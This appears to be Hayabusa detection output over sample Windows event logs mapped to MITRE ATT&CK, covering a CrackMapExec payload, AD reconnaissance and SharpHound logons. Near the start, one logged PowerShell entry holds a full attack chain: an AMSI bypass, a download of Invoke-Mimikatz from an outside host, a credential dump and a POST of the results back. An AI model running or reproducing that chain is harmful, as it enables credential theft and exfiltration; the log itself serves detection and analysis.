Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.691 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Item): ""Set-Item"" ParameterBinding(Set-Item): name=""Path""; value=""VaRiAble:Ofs"" ParameterBinding(Set-Item): name=""Value""; value="" """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Invoke-Expression): ""Invoke-Expression"" ParameterBinding(Invoke-Expression): name=""Command""; value=""[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('https://10.23.123.11:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://10.23.123.11:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()"" TerminatingError(Invoke-Expression): ""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.253 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.255 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.274 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.369 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.422 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.450 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.469 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.477 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-String): ""Out-String"" CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""Transcript""; value=""True"" ParameterBinding(Out-String): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software."" ParameterBinding(Out-Default): name=""InputObject""; value=""Invoke-Expression : At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + . ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}10 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.512 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.513 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.522 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.524 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.556 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.597 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.626 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx 2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx 2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.772 